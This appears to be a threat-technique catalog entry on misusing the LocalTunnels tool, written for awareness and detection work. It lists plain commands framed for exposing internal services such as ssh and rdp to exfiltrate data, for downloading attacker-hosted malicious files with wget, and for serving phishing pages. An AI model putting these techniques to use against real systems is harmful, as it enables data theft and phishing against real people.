.. /LocalTunnels
Star

Access
Access
Install
Exfiltration
Download
Phishing

LocalTunnels enables insiders as well as threat actors to expose local ports over the LocalTunnels generated links. The access is protected with a password. However, it can be accessed directly on the main page the first time tunnel is accessed. The important thing to note is that a service is required to be running onto the port which is required to be exposed. On the other hand, threat actors can set up their own listening server using LocalTunnels server provided on their GitHub page. This can be used by the insiders to exfiltrate the local data outside as well as threat actors to host phishing pages, malicious binaries etc.

Paths:

Resources:

Acknowledgements:

Detections:

Access

  1. This is a quick way to start the localtunnels by directly executing the localtunnels and generating links.

    npx localtunnel --port <PORT>
    Use case
    Quick execution of localtunnels.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Access

  1. This will bind the local port running on the server to the domain name and the port that is required to bind to the local port.

    lt --host http|https://<URL>:<PORT> --PORT <LOCAL PORT>
    Use case
    Configuring the server to bind a local port and have it exposed via the server LocalTunnels are installed on.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Install

  1. This will install localtunnels globally on the system.

    npm install -g localtunnel
    Use case
    Installing localtunnels globally.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Exfiltration

  1. This will install localtunnels globally on the system.

    lt --port <PORT>
    Use case
    This binds the local service running to the LocalTunnels URL which can be accessed over the internet for data exfiltration. This can be binded to internal apps, ssh, rdp and other services/applications running locally.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Download

  1. This will enable insiders as well as threat actors to download the hosted files onto the machine.

    wget http|https://<URL>/<File/Directory>
    Use case
    Insiders exposing local system and downloading the files. Threat Actors hosting malicious files and downloading those onto the targeted system.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Phishing

  1. The URLs generated can be binded to a locally hosting phising page by the threat actors.

    lt --port <PORT>
    Use case
    Threat Actors binding the LocalTunnels port to the locally hosted Phishing Side and sending out the link to victims.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux